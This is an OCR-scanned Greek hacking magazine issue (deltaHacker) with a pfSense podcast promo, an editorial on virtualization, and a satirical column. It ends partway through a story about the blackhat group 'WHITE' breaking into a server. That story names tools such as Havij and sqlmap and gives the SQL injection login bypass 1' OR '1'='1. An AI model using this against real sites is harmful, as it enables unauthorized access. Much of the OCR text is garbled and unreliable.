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НОМЕ SERVER [18 


[*] ...ко η εξέταση µιας αξιόλογης πρότασης για ro OS του ;) 


και οδηγίες χρήσης 


Όχι και το τόσο τυχαίες σκέψεις, 
σε όχι και τόσο τυχαία σειρά 


O Θεΐος Ακάκιος εξηγεί γιατί η συλλογική 
βλακεία διαφέρει από την ατομική 


Μετά από αρκετό καιρό σιωπής, 
λαμβάνουμε επιτέλους αναφορά από τον 
κατάσκοπό µας στην ομάδα WHITE! 


Encapsulation, demultiplexing, 
ports κι ανακατευθύνσεις 
(...«ou dynamic DNS :D) 


Lean, mean, malware-analysis machine 
(...5 πῶς η ανάλυση malware αυτοματοποιείται εντελώς) 


Synthesizer µε εγκέφαλο! 


The Graffiti Artist! 


Επίθεση phishing σε ελληνικό 
forum περί security 


Ναι, µόνο που για τον καθένα εἶναι δια- 
φορετικός ;) 


Εκδότης / Διευθυντής Χρήστος Βαρελάς 
Αρχισυντάκτης Παναγιώτης Βαρελάς 
Σύμβουλοι ἐκδοσης Νίκος Μουρατίδης, Βούλα Παυλίδου 


Σύνταξη Παναγιώτης Βαρελάς, Χρήστος Βαρελάς, Ανδρέας 
Βενιέρης, Γιώργος Γιάννου, Μανώλης Κιαγιάς, Ιωάννης 
Κονιάρης, Γιώργος Μελέκος, Νίκος Μουρατίδης, Νικόλαος 
Σηφάκης, Μέσος Παπαδόπουλος (TM), Χρίστος Τόμπρας 


Γραμματική επιμέλεια Βούλα Παυλίδου 


Καλλιτεχνική Επιμέλεια 


To περιοδικὀ deltaHacker εἶναι συνδρομητικὀ και εκδίδεται апо την Parabing Creations 
δώδεκα φορὲς το χρόνο, κάθε μήνα. H Parabing Creations έχει την έδρα της στη Μαιώτιδος 
3, 55 133, Καλαμαριά. H εκτύπωση και η βιβλιοδεσία γίνονται απὀ την ThessPrint Α.Ε. Το 
email επικοινωνίας του περιοδικού εἶναι το talk2us@deltahacker.gr και το email για τις 
συνδρομές ro subscriptions@deltahacker.gr. Οι πληροφορἰες yia τις συνδρομὲς εἶναι στο 
http://deltahacker.gr/subscriptions και οι παραγγελἰες γίνονται απὀ το http://deltahacker. 
gr/order. Όλες οι a εις που εκφράζονται στα άρθρα δεν εκφράζουν απαραίτητα και τη 
γνώμη του περιοδικι 


(5) Εσείς το ξέρετε ότι είστε σπόνσορας του deltaCast; 
http://deltahacker.gr/category/deltacast 
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deltaCast «01607 | pfSense FTW 


Posted by. 1 13/03/2013, 23:01 | Published In П 


To pfSense είναι ένα θαυμάσιο λειτουργικό σύστημα για τη 
δημιουργία πανίσχυρων και ικανότατων routers, που 
διανέμεται δωρεάν. Πέρα από την απόλυτη ασφάλεια και 
την τεράστια ευελιξία, παρέχει έξτρα δυνατότητες που 
μόνο τα πανάκριβα routers διαθέτουν -- και δεν συζητάμε 
καν γι’ αυτά που δίνουν οι ISPs! 


>“ Στο 7ο επεισόδιο της lnc σεζόν του deltaCast παρουσιάζουμε ro pfSense και τις 
sí e07 1; дич δυνατότητές του, ενώ δείχνουμε την εγκατάσταση, τη ρύθμιση και τη μετέπειτα χρήση του 


o μπα ποια οπής πώς а ο 
deltaCast Si., а моор О а „рд ар, στα πλαίσια ενός πλήρους, εικονικού δικτύου. 


Posted bY ` л па койд, xat To επεισόδιο µπορείτε να το παρακολουθήσετε απευθείας εδώ ñ να 
και να το δείτε αργότερα, 


Σπόνσορες του deltaCast εἴστε εσείς, οι συνδροµητές του περιοδικού deltaHacker. Χωρίς 
τῇ στήριξή σας δεν θα μπορούσαμε να φτιάχνουμε αυτά τα επεισόδια. Σας ευχαριστούμε! 


Θέλετε ειδοποιήσεις στο email σας κάθε φορά που βγαίνει νέο deltaCast; 
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Πίνακας ελέγχου. 
Αρχείο δημοσιεύσεων 
Γενικό προφίλ 
Προφίλ στο forum 


Αποσύνδεση 


а 


Γίνε συνδρομητή 


Ἄρθρα Απαντήσεις Θέματα 
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Πίνακας ελέγχου, 
Αρχείο δημοσιεύσεων. 
Γενικό προφίλ. 

Προφίλ στο forum 
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Sub?2raw oro 


Πλήρη άρθρα που συμπληρώνουν το περιοδικό. Τα εβδοµαδιαΐα 
deltaCast. Τα προκλητικά mind hacks. Όλα τα βίντεο από τα live 
streams. Ολόκληρα blasts from the past. Τα πάντα ενδιαφέροντα 
fora. Το σημείο συνάντησης για τους φίλους του περιοδικού. 


deltahacker.gr 


Αληθινό, διασκεδαστικό hacking για όλους! 
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Фа Сез 301007 | prye, 


E — CÓ m a LP. "ү; 
Ὅταν εἶχα ακούσει για πρώτη φορά τη λέξη «ευλογία», στα "^ 
πλαίσια σοβαρής ανάλυσης που kapia σχέση δεν εἶχε pE ra 
θεία ñ οτιδήποτε μεταφυσικὀ, µε óuckoAia εἶχα κρατηθεἰ 
апо το να Вало та γέλια. Δεν θα ἐπρεπε. Δεν θα ἦταν guys- 
νικὀ, οὖτε np£nov. 


Па να τα καταφέρω, θυμάμαι πως εἰχα δαγκὠσει απὀτομα τη * 
γλὠσσα µου. Βρισκὀμουν στο γραφείο του κυρίου Χ --ονόματα 
δεν αναφέρουµε--, μαζί µετους κυρίους Y και Z. Περιμέναμετους Ë 
{А συναδέλφους P και Q, yia την καθιερωμένη σύσκεψη στα τέλη ToU 
µήνα. Ξαφνικά, κάποιος, κάτι ανέφερε, το onoio ката пос φάνηκε 
ἠταν η τέλεια αφορµἠ για у’ αρχίσει ο κύριος X µια αναπάντεχη 
ανάλυση περὶ των θετικών του καπιταλισμού. Δεν αστειεύομαι. 
Αυτό ἠταν το θέµα της ανἀλυσής rou. Εκεὶ Aoinóv που µας &Ae- Ё 
UM γε πόσο καλἠ ιδέα εἶναι ο καπιταλισμός κι εγὠ σκεφτόμουν ότι - 
ΝΡ πρέπει να περιορἰσω λίγο ro ντελίβερι αλλά απὀ βδομάδα γιατὶ É 
ερχόταν ΣΚ και εἶχα προγραμματισμένο μαραθώνιο στην Зп σεζὀν 
του «24», ακούω ξαφνικὰ τον κύριο X να λέει: «Μην το συζητάτε. 
O καπιταλισμὸς εἰναι ευλογία». Δεν ξέρω αν και σήµερα ο κος X 
πιστεύει το ἴδιο —ката паса πιθανότητα δεν θα ἐχει μετακινηθεὶ 
και πολύ апо τις θέσεις του--, τη στιγμὴ εκείνη όμως ἠθελα va 
ορμήσω ἐξω апо το γραφείο του, να τρέξω στο γραφείο του ка- 
' Лоо φίλου και συναδέλφου A και να του μεταφέρω то ολόφρεσκο 
υλικό για τη σἀτιρὰ µας. 


Ναι, η πάντα καλοπροαἱρετη сатра µας περιστρεφόταν ou- VT 
χνά-πυκνά γύρω апо τον κύριο X. Εἶναι που και οι δύο μπορούμε ' 

TÉ να μιμούμαστε µε επιτυχία την κάπως βαθιά, ελαφρώς μεταλλική. % 

j του φωνὴ. Ακόμη και σήμερα, ὁποτε συναντιόμαστε pe TOV Л ap- 
χίζουμε να μιλάμε µε τη φωνἠ του κυρίου X — кала να εἶναι, ο $ 
άνθρωπος. 


D δ. 
Á 
Чуу «NY 
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O καπιταλισμὀς, που λέτε, για κἀποιους εἶναι ευλογία. Εγὠ ropa o£- 
βομαι τα «πιστεύω» των ἀλλων(ώνε), арке! να µην αισθάνομαι бт! εἶναι 
προσβλητικἁ ἠ/και βλαπτικά για το γενικὀ кало. Αλλά το θέμα εδώ, aya- 
πητὲς κι αγαπητοί, δεν εἶναι οὐτε η στάση µου, οὐτε TO τι «αισθάνομαι». 
Το Өёна εἶναι От! апо τη στιγμὴ που ἄκουσα τη φράση «ο καπιταλισμός = 
εἶναι ευλογία», µου κὀλλησε κι ἀρχισα να τη χρησιμοποιώ. Το κάνω ακόµη 
και σήμερα, περιττὸ να πω. Λέω, N.X., От! «το κρύο εἶναι ευλογία» ἡ От! 
--- «η σως μπάρμπεκιου εἶναι ευλογία» ἡ ὁτι «η επόμενη γενιά επεξεργα- | 
- στῶν της ivrgA θα εἶναι ευλογία» κ.ο.κ. Αν —Аёнє, αν-- ρωτήσετε av- 
θρώπους µε τους οποίους κάνω παρέα, ὀχι μόνο θα σας ro επαληθεύσουν 
αλλά θα σας πουν бт! δηλώσεις σαν τις προαναφερθείσες τις κάνω πάντα 
µε µια κάπως βαθιά, ελαφρώς μεταλλικἠ фоуй. Тора που το σκέφτομαι, 
1 οι περισσότεροι δεν γνωρίζουν γιατί. 


Εδώ και κάποιες εβδομάδες, διάφορες υποχρεώσεις-5ἰᾶςη-ευχάριστες 
ενασχολήσεις μού £xouv θυμίσει ὁτι «ro virtualization εἶναι ευλογία» — 
: επίσης. Δεν ξέρω, αυτή η ιδέα της φυσικἠς μηχανὴἠς nou εξομοιώνει σε 7 
| επἰπεδο λογισμικού µια ἄλλη μηχανὴ και μετὰ ἐχεις λογισμικὀ που трё- 
χει £vTÓG του εξομοιωμένου περιβάλλοντος χωρίς να ει την παραμι- 
κρὴ ιδέα ὁτι πρὀκειται για εικονικὴ μηχανὴ, πάντα µε γοήτευε. Σίγουρα : 
; ἐπαιξε ρὀλο και η πρώτη, συναρπαστική εμπειρία µε το virtualization, | 
εν ἑτει 1998. Σε ἑνα PC µε 128MB RAM και Mandrake Linux (ñ μήπως 
iX ἦταν ro RedHat;) εἶχα τρέξει ша апо τις πρώτες εκδόσεις του VMWare # 
ΓΞ. Workstation. Μέσα σε εικονικἠ μηχανή µε 32MB RAM, εἰχα σηκώσει £ni- 
i TUXOG τα Windows 95. Βρισκόμουν с’ èva απὀ τα εργαστήρια του THÌ- 
ματος Πληροφορικής του ΑΠΘ εκεἰνη την ηµέρα (όπως και σχεδὀν κάθε 
ἄλλη μέρα), οπότε φώναξα τον Ηλία δεἰχνοντάς rou την οθὀνη rou PC. 
| Μόλις ο άνθρωπος συνειδητοποίησε τι έβλεπε και ξεπέρασε το прото 
‚ σοκ, ακόμα θυμάμαι το σχὀλιὸ του: «кала, μιλάμε για προγραμματιστές 
µε απἰδια». Δεν εἶχε καθόλου ἀδικο. 


Каша δεκαπενταριὰἁ χρόνια ¿xouv περάσει апо τότε, μολαταύτα για 
'uéva το virtualization εξακολουθεί να "vai кат! το θαυμαστό. Αλλά ci- | 
į ναι κι εξαιρετικἀ χρήσιμο. Θέλεις, π.χ., να στήσεις ἑνα εργαστήριο για 
penetration testing, αλλά έχεις μόνον ἑναν υπολογιστή διαθέσιμο; Κανέ- 
να πρὀβλημα: Αν εἶναι σχετικἀ καινούργιος και µε τουλάχιστον 8GB RAM, y% 
στήνεις ἑνα opaióraro virtual lab και κάνεις τη δουλειά σου (http:// 
deltahacker.gr/deltacast-s01e06). Θέλεις μήπως να δοκιµάσεις αυτό το 
| pfSense, yia ro οποίο тора τελευταία κάποιοι φροντίζουν να σε ζαλίζουν 
anó ro про! μέχρι το βράδυ; Λοιπόν, δεν χρειάζεται va το βάλεις σε αλη- Í 
4 θινὀ hardware. Φτιάξε ἑνα VM, εγκατἀστησὲ το εκεἰ μέσα και ψἀξ’ то µε 
την ησυχία σου (http://deltahacker.gr/deltacast-s01e07). 


Θα μπορούσα να συνεχίσω µε та παραδεϊγµατα, алла νομἰζω ὁτι εἶναι 

. περιττά. Θα πω μόνο ὁτι, ανέκαθεν, τα πολλαπλά επίπεδα αφαίρεσης, εν 
προκειμένω η ιδέα της μηχανὴς πάνω апо τη μηχανὴ πάνω апо τη µηχα- 
vů κ.ο.κ., πάντα µε ἑκαναν να κοντοστέκοµαι, akpiBog σαν rov xapakrr|- 
ρα της φορτωμένης апо кло νουβέλας, και να θαυμάζω τη δηµιουργι- 
κότητα του ανθρώπινου πνεύματος (ειδικἁ όταν η νύχτα εἶναι βροχερἠ). Ж 
To virtualization εἶναι ευλογία, φίλες και φίλοι. Και σύμφωνα µε тоу κύριο 
X όλα ξεκινούν απὸ τον καπιταλισμὀ, ο οποίος εἶναι επίσης ευλογία. 


σνένλ. рел 


Αγαπητοί µου, / - 
O θυµόσοφος λαός то έχεν πεν.καθαρά. Z 


«О Φλεβάρης xv αν φλεβίσεν, καλοκαίρύ θα μυρίσεν.» 


Να, όλη νύχτα χαρεκλοπόδαρα, KAL τώρα, ήλιος. 


Καρεκλοπόδαρα µε επιπτώσεις όμως. Στα ποινωνικά µέσα συζητείται, 
πλέον, η τροποποίηση του ρητού σε κάτι πιο επίκαιρο. 

Ας πούμε: «О Φλεβάρης σαν φλεβίζεν, η Αθήνα πλημμυρίζεν.» H κάτν τέ- 
тою. 

Καν µε то πον πλημμυρίζει η Αθήνα βγαίνουν όλον σαν τα σαλιγκάρια στις 
τηλεοράσεις καν τους υντερνέδες καν αρχινάνε ξανά τα περί βιβλικής κατα- 
στροφής, yla την κυκλοφορία των οχημάτων, για την ολιγωρία τον κράτους, 
για τις κλήσεις που δέχτηκε η πυροσβεστική, για τα φραγμένα φρεάτια που 
δεν καθαρίζουν ον δήμου, үш. τα ρέματα που τα έχουν µπαζώσεν ον ασυνεί- 
δητου, καν πάει λέγοντας. 

Μπλα μπλα μπλα, μπλα μπλα μπλα μπλα. 

Όπως το έλεγε παλιά ο ποιητής (δια στόματος στρατηγού Λάμαχου): 
Μπλα μπλα μπλα δημοκρατία, μπλα μπλα μπλα µε επλέξανε. 

Αλλά τι σας λέω εγώ τώρα, εσείς είστε νέα παιδιά, ιντερνετικά, σιγά µη 
σας λέει τίποτα το όνομα Λάμαχος. 

Ἐπί Πελοποννησιακού Πολέμου ο Λάμαχος, ενθυμούμαν τον, πον θα έλεγε 
καν ο παππούς. 

Τέλος πάντων, να µην τα πολυλογώ, τώρα έχει βγάλει φοβερή λιακάδα, 
καν ακόµα καν τούτη η πόλη, εξ αποστάσεως όπως την ατενίζω, μονάζεν αι- 
σιόδοξη καν όμορφη. Λαμπυρίζει. 

Δεν µασάω. Γνωρίζω τόσο Καλά бсо xv ο καθένας ότι αυτή η Ομορφιά εί- 
VAL επίπλαστη καν επιφανειακή. H, αν ὀχι επιφανειακή, τότε μεταμοντέρνα. 

Δέρετε, σαν κάτι φωτογραφίες του Salgado, που σε κάνουν να πιστεύεις 
ότι τα προσφυγικά στρατόπεδα στην Αιθιοπία έχουν κάτν-τις μοναδικό, µια 
ρομαντική δύναμη, ένα πάθος για ζωή, ένα μήνυμα αισιοδοξίας. 

Τώρα δεν ξέρω αν αυτό πράγματι το λέμε «μεταμοντέρνο», but you get 
the idea. 

Λοιπόν, µια που το 'φερε ту κουβέντα, θυμάμαν µνα φορά µετά τους σει- 
σμούς του '99, ἡμουν σε ένα ταξί, κάπου πήγαινα, καν στο ραδιόφωνο ήταν 
pLa δημοσιογράφος που μιλούσε στο τηλέφωνο µε συγγενή ενός από τα θύ- 
ματα της PIKOMES. 

PIKOMES ήταν το εργοστάσιο που είχε πέσει γιατί ένας εφευρετικός ερ- 
γολάβος είχε κόφεν κάτι κολώνες για να χωράνε τα Bav. 


Στο ραδιόφωνο ο συγγενής ήταν απαρηγόρητος, αλλά η δημοσιογράφος 
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Σνέιλ μέιλ 
Αα 


τον καθησύχαζε. «Σας νονώθω», του έλεγε. «О πόνος είναν ακόµα μεγάλος. 
Αλλά µε τον καιρό, όταν ο σεισμός θα έχει µείνεν σαν pia γλυκιά ανάµνη- 
On...» 


Πρέπεν να ήταν πραγματικά. πολύ απαρηγόρητος o συγγενής γνα να µην 
βάλεν τις φωνές ἡ να µην της Ἠλείσεν το τηλέφωνο. 

To οποίον, για ν' αλλάξουμε και λίγο θέµα (καν pra Χαν μιλάμε για peta- 
μοντερνισμό) µου φέρνει στο μυαλό την έκπληξη που νοιώθω πότε πότε που 
έχεν γεμίσει ο τόπος Χρυσά Αβγά. Н αλήθεια είναι ότι δεν θα έπρεπε (να 
νονώθω έκπληξη). To πρόβλημα των Αβγών δεν εἶναι ούτε πρόσφατο, οὔτε, 
απλώς, πρόβλημα παραβατικής αυτοδικίας, αντιποίησης αρχής, εθνικινστικών 
ιδεοληφιών, φυλετικού τραμπουκισμού ή μετεφηβνκών ναζιστικών ονειρώξε- 
ων. 

Е мо βέβαια όλα αυτά, αλλά δεν είναν µόνο αυτά. 

To πρόβλημα των АВүшу εἶναι πρωτίστως πρόβλημα συλλογικής έκπτωσης. 
Συλλογνκῆς βλακείας. 

E βλακεία σε рка. κοινωνία είναν σαν την γρίπη. Είναν μόλυνση. ТОТ). Ον 
ασπιρίνες καν τα μαντζούνινα δεν βοηθάνε. Πρέπει να περυμένεις να κάνεν 
τον κύχλο της. 

Σας φαίνεταν παράξενο, έτσι» θα λέγατε, ἴσως, ÓTL η συλλογική βλακεία 
είναν θέµα IG, ναι; 


Ер, ὀχν. Δεν είναι. Γιατί, πείτε μου, IG ποιανού; 


Εκτός ж αν μείνουμε στην περίπτωση της δημοσιογράφου µε το σεισμό. Н 
οποία, θα συμφωνήσω, πουκιά έτρωγε, κουκιά μαρτυρούσε. 


(Που θα έλεγε x. o θυµόσοφος λαός.) 


Κατ' αρχάς, για να τα βάλουμε λίγο σε τάξη: Πείτε μον, ποιο είναι το 
υποκείµενο όταν εξετάζουμε pLa κοννωνία Т) έναν λαό: 


Еүш; Н Μαιρούλα» О κύριος Κώστας που γλυκοκοντάζεν την περυπτέρισσα; 
H γητέρα της εξαδέλφης που είναν Ινδουίστρνα; O εφοριακός της γεντονιάς; 
O φουσκωτός µε το μαύρο κολλητό μπλουζάκι καν τη γαλανόλευχηΣ 


Н απάντηση είναι: Κανένας απὀ αυτούς συγκεκριµένα. OOL µας είμαστε 
υποκείμενα, αλλά το σύνολο πον συναπαρτίζουµε δεν είναν. 


Κατά τον (6vo τρόπο πον ένα σύνολο алб μπανάνες δεν είναν μπανάνα. 


Н έννοια της συλλογικής βλακείας διαφέρει πολύ απὀ την έννοια της 
ατομικής βλακείας. Μάλιστα, αν ήθελα να είμαι πραγματικά ακριβόλογος, 
θα έπρεπε να αποφεύγω να τη χρησιμοποιώ για να αποφύγω παρερμηνείες. 


E βασική τους διαφορά έγκει- 
ταν στο бт, ο ὀρος συλλογική 
βλακεία αναφέρεται σε διαδικα- 
σία, μάλλον, παρά σε ποιότητα. 


Επιπλέον, η ὕπαρξη της μίας 
Oev συνδέεται µε την ὕπαρξη 
της άλλης. Мо, κοινωνία µπορεί 
να έχεν πρόβλημα συλλογικής 
βλαμείας, έστω καν αν όλα τα 
υποκείμενα που την συναπαρτί- 
ζουν είναι απόφοντον πανεπινστη- 
pilou. Καν αντιστρόφως. 


Για να γενικεύσω λίγο, το αυ- 
τόν ισχύει τόσο για τα αρνητικά 
όσο και για τα θετικά συλλογικά 
χαρακτηριστικά µιας κοννωνίας. 
Πάρτε ας πούμε περιόδους όπως η 
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σνένὰ μένλ 


VHA@KER 


NNN 


Κλασική Αρχαιότητα, η Αναγέννηση, η Βιομηχανική Επανάσταση, ο Μεσαίω- 
νας, ο Γερμανικός Ῥομαντισμός, ἡ ο Ναζισμός. 

Ον αρχαίον Αθηναίου δεν ήταν όλον φιλόσοφου ἡ γλύπτες, ας το παρα- 
δεχτούμε. Ούτε, αντιστοίχως, ήταν ρομαντυκοί ποιητές ἡ μουσικοί όλον ον 
γερμανόφωνου του ὕστερον 18ου ανώνα. 


Κάπως, όµως, συµβαίνεν και, για παράδειγµα, αν ήσουν ελεύθερος πολί- 
της στην Αθήνα του Περικλή θεωρείτο “коол να έχεις γνώμη, καν μάλιστα 
ενδιαφέρουσα γνώμη, για την Οντολογία καν την Ἠθική. Έβαζες το κεφάλιν 
σου κάτω καν διάβαζες. Όπως ήταν Ἑαυτονόητοσς στη Ναζιστική Γερμανία 
να πιστεύεις ÓTL η βιολογία «επιβεβαιώνει» πως yla όλα τα δεινά φταίνε 
ον εβραίομπολσεβίκον τραπεζίτες. Pu αυτό και δεν σε πείραζε που έβλεπες 
να στέλνουν µε το ζόρι τους Εβραίους γεντόνους σου στην Πολωνία «για να 
εργαστούν», έστω καν αν δεν ήταν µπολσεβίκον ἡ τραπεζίτες. Κρίμα τους 
ανθρώπους, αλλά αφού έχουν μολυσμένο αίμα, τν μπορείς να κάνεις εσύ. Μί- 
λησε η επιστήμη. 

Peer pressure, το λένε αυτό OL φίλον µας ov Άγγλου, 

To αυτόν και τα Χρυσά Αβγά, αγαπητοί µου. Peer pressure. 

Μια γρίπη πον πρέπει να κάνεν τον κύκλο της. 


Τώρα αν µε ρωτήσετε πόσο καιρό θέλεν ο κύκλος της συγκεκριμένης Ypi- 
πης, θα σας γελάσω. 

Αλλά δεν είµαν ανσιόδοξος. θα χρειαστούμε καμιά τριανταριά χρόνια, 
χαλαρά. Να µην πω παν παραπάνω. Γιατί καμιά φορά алб γρίπη παθαίνεις 
καν πνευμονία. 

Καν βέβανα σε τριάντα χρόνια, πονος ζει, ποιος πεθαΐνεν. Ακόμα xv απ' 
την κρίση, σε τριάντα χρόνια µια γλυκιά ανάµνηση θα έχεν μείνεν. 

Αλλά τα Αβγά, ὀχν. Λυτά φοβούμαν πως θα είναι εκεί. Σταθερά. 

Όπως έλεγε πριν алб μερικά χρόνια στο Wired o Jason Lanier (αναφο- 
ρικά µε κάτι ἀλλο), «Μηχανές άτρωτες στην βλακεία δεν φτιάχνονται, γιατί 
η βλακεία εἶναι ιδιαίτερα εφευρετική». 

Τώρα µη µε ρωτήστε ποιος εἶναι o Lanier, γνατί θα στεναχωρηθώ. Εντά- 
ξεν για τον Λάμαχο, το καταπίνω. Αλλά ὀχν καν ποιος εἶναι o Lanier. 

Tv το έχετε το Google, є; 

О Lanier, λοιπόν, υπήρξε, μεταξύ ἄλλων, πρωτεργάτης στον χώρο των 
τεχνολογνών εικονικής πραγματικότητας. Μάλιστα ο όρος Virtual Reality 
είναν δικός του. 

Είναι pa ελαφρώς εκκεντρική φυσιογνωμία, µε ευθυτενή πορµοστασιά 
(хин), µε ροδαλό πρόσωπο καν μακριά κοτσίδια ράστα (αν καν είναν λευ- 
κός). Στα διαλείμματα παίζει οὐτι καν γράφει μουσικῇ. 

Tov έχω στο μναλό μον αυτές τις μέρες γιατί διαβάζω ένα του βιβλίο πον 
μου πήρε δώρο για τις γνορτές ο ανιφιός, καν µου το έστειλε εκ των υστέ- 
ρων, µέσω Amazon. Πάλι καλά, γνατί πάνω πον είχα αρχίσει να Υκρινιάζω 
δημοσίως бть κανείς δεν µε θυμάται καν κανείς δεν μου κάνεν δώρα. 

Βιβλνογραφική αναφορά: «You are not a gadget. А manifesto», υπό 
Jaron Lanier, εμδόσεις Alfred Knopf, Νέα Ὑόρκη, 2010. 

Ναι, αυτό µπορείτε να το επλάβετε ως έμμεση προτροπή. (H γκρίζα bra- 
φήμιση.) 

Να µην σας πω ότι θα πέσει τεστάκι reading comprehension την άλλη 
φορά. 

Σας ασπάζομαν, 
θείος Ακάκιος 


deltaB 


HA(GKER 


Στη 2η χρονιά και συνεχίζουμε ακάθεκτοι! 


Μηνιαίο περιοδικό deltaHacker, http://deltahacker.gr 
Ethical Hacking / Δίκτυα / Ασφάλεια / Προγραμματισμός / Ηλεκτρονικά 


/ / 


Е twitter.com/deltaHacker 


f 


SYRIAN 
ARMY 


bu Thiseas 


Μετά anó αρκετὀ kaipó σιωπἠς, 
λαμβάνουμε επιτέλους ἑνα 
email anó την ομάδα WHITE. 
O κατἀσκοπὀς µας ἐχει µια νέα 
ιστορἱα και η αναφορά του 
εἶναι, όπως πάντα, διδακτικἠ και 
ενδιαφἑρουσα... 


YV HAQKER 


ÁN 


Па ὁσους δεν θυμούνται ἡ δεν γνωρίζουν, θα πρἐπει να πούμε 
ξανά μερικά πράγματα. Συντάκτης µας ἐχει καταφέρει να γίνει Hé- 
λος µιας κλειστής ομάδας blackhat, µε το ὀνομα WHITE (White 
Hacking Is Too Easy). H ομάδα κερδίζει χρήματα πουλώντας δεδο- 
μένα στη μαύρη ayopá, ὁπως, N.X., κωδικούς πιστωτικών καρτών 
και προσωπικἁ δεδομένα σε εταιρείες spam. Επιπρόσθετα, η ομάδα 
κλέβει βάσεις δεδομένων, απειλεί εταιρείες µε τη δημοσιοποίηση 
ευαίσθητων στοιχείων, επιδίδεται στη βιομηχανικὴ κατασκοπεία 
Kai φυσικἁ προκαλεί δολιοφθορές — πάντα катӣ παραγγελία. Μετά 
апд κάθε επιχείρηση, o npákropác µας στέλνει µια αναφορά µε 
όλες (ἡ σχεδόν ὀλες) τις πληροφορίες για την επίθεση. H τελευταία 
επίθεση yia την οποία ενηµερωθήκαµε ήταν λίγο διαφορετική апо 
τις ἄλλες. Σχετίζεται µε το πιθανὀ ξέσπασμα κυβερνοπολέμου HE- 
ra£U κρατών. Όπως πάντα, παραθέτουμε τα στοιχεία που λάβαμε 
апд τον ἀνθρωπὸ µας αυτούσια... 


erret 
M = 
F —— ——— š wen 
w nter trt ^ үр”... 


Επικοινώνησε μαζὶ µου ο αρχηγός και µου εἰπε πως έχουμε µια υπόθε- 
ση που μάλλον αφορά κυβερνοκατασκοπεία. Πληροφορίες αναφέρουν 
ότι ηλεκτρονικοἱ πράκτορες της Συρἰας ¿xouv αρχίσει να καταλαμβάνουν 
συγκεκριμένους servers στην Παραγουάη. H κλήση που λάβαμε, λοιπὸν, 
ἦταν anó την Παραγουάη και ανέφερε От! υπάρχουν υποψίες πως ἑνας 
συγκεκριμένος server έχει καταληφθεί. Το πιθανότερο εἶναι να χρησι- 
µοποιηθεἰ ως jump box (Σ.τ.Α. Δείτε το σχετικὀ άρθρο στο deltaHacker 
008). Αυτὀ που ζητήθηκε апо εμένα εἶναι να καταφέρουμε να μπούμε 
στον συγκεκριµένο server, να αναζητήσουμε αποδείξεις για την επίθεση 
апо ανθρώπους της Συρίας, καθώς επἰσης και να βρούμε τον τρόπο µε 
τον οποίο ἐδρασαν. Τελικά, το μόνο που πήρα στα χέρια µου εἶναι η IP και 
το domain name του εν λόγω server (βλ. εικὀνα 1). 


14 


€ э f py—— Tv e| | - сол ^| w |+ 
^ 
| 
hun o | 
4 И, hh piis б ДУ?! | 
ел — — | 
κ.α ЕСА k — ο... Lo) 1 
——————————— ————Y 
«κ Catálogo de productos 
ips , Ανν Fir # Md 
a АДА 4... А 
4 
Εικόνα 1 


Н εικὀνα του site 
στο οποίο θα... 
εργαστούμε! 


Πμάδα WHITE: Syrian 


ЕЕЕ 


Αφού περιεργαστήκαµε μερικὲς ημέρες то site, αποφασίσαμε va ξεκινἠ- 
coupe ре тоу πιο απλὀ τρόπο. Να βρούμε прота αν υπάρχει administrator 


panel και, αν υπάρχει, να δούµε μήπως ἐχει κάποια αδυναμία. Па va ava- Εικόνα 2 
ζητήσουμε ro admin panel χρησιμοποιήσαμε το πρὀγραμμα Havij. Про- Από то буора 
κειται για εργαλείο που ανακαλύπτει абиуанїєс SQL injection, αλλά έχει και μόνο, φαίνε- 
και µια πολύ βολικἠ δυνατότητα: αναζητά και εντοπἰζει φόρμες σύνδε- τα UO μι απο 
σης. Όπως βλέπετε στην εικόνα 2, µε τη βοἠθειἁ του βρήκαμε σύντο- τ L = 
μα δύο τέτοιες πόρτες. Αυτή nou µας ενδιαφἑρει εἶναι εκείνη nou ἐχει προορίζεται yia 
στο URL τη λέξη admin. Δοκιμάζοντας το συγκεκριµένο URL οδηγήθηκα τη σύνδεση στο 
σε µια οθὀνη εισαγωγἠς. Ἠταν λιτή και ζητούσε κωδικό και password πάνελ διαχείρι- 
(βλ. εικὀνα 3). uL 


— emen 


Rr mu 
PF, 


— ——— 
— — ii 


— еее" —— 


Target: | 


[ ]Keyword: Auto Detect 


| Analyze Pause 


[C] Syntax: [Auto Detect 


Database: | MsSQL with error 


у Method: [cer v| Type: [Integer v| e 


Post Data: 


Tables 


: Load Save 


ΕἸ - Ф di, Y 


Read Files Ста Shell Query  |Find Admin — MD5 


Path to search: | 


κα. 


@) Success гез: [200,500,301,302,4] Web Apps: [php,asp Threads: |5 


YY d 


(О Faiture res: 400,401,404 Timeout 10 Нешез |1 


Found Pages: 


POPARA ogin.php 


Response 


б Status: l'm IDLE 


Finding admin page: 4 ^e 


Clear Log 


κ“ 


Page Found: ў Гаагу 
Page Found: ρα ^n login.php 


Job Canceled! 


Από εδὠ και πέρα αρχίσαμε 


να ελέγχουμε την αντοχή της φόρμας σε 


διάφορες επιθέσεις. Αυτό που κάνουµε συνήθως σε τέτοιες περιπτώσεις 
εἶναι το va «μοιράζουμε» τα διαθέσιµα εργαλεία σε ὀσους εργάζονται στη 


συγκεκριμένη επίθεση. Έτσι, 


ἑνας μέλος της ομάδας καταπιάστηκε µε TO 


Sqlmap, κάποιος ἄλλος µε ro Bruter, ἑνας τρίτος µε ra σχετικἀ Firefox 
addons (sqllnjectMe, hackMe) κ.ο.κ. Τελικά, κἀποιος τα κατάφερε. AUTÒ 
βέβαια δεν σημαίνει бт! αυτὸς που τα κατάφερε εἶναι καλύτερος апо τους 


ἄλλους, οὐτε ὁτι το εργαλείο 
το αποτέλεσµα σε τέτοιες πε 


βρω... μμ ος μμ”. i ti 


που χρησιμοποίησε ἦταν nio кало. Συχνὰ, 
ριπτώσεις εἶναι θέμα τύχης. Πρέπει εδὠ να 


WV'HAGIKER 


ЕУ 


| 9 Fa КАСА - Login - Mozilla Firefox - "EN 


File Edit View History Bookmarks Tools Help 


Ў ΑΕΤΟ 


# > + 


Εικόνα 3 
H φόρμα σύνδεσης για την πρὀ- 
σβαση στο σύστημα διαχείρισης. 


πω то εξἠς: H συγκεκριμένη φόρμα ἦταν кала κρυμμένη και ἑνας αρχάρι- 
ος δεν θα την εντόπιζε εὐκολα, οπὀτε δεν θα μπορούσε και να επιτεθεἰ. О 
κὠδικάς της, όμως, ἦταν απρὀσεκτα γραμμένος και τελικἁ η φόρμα ἐπα- 
oxe апо µια αδυναμία SQL Injection. Αν κἄποιος δώσει για password το 
1' OR '1'='1, συνδέεται στο σύστημα διαχείρισης σαν κύριος! (βλ. εικόνα 4) 


f | # Z&66666660/Üadmin/menu.php 


[т v] ο 


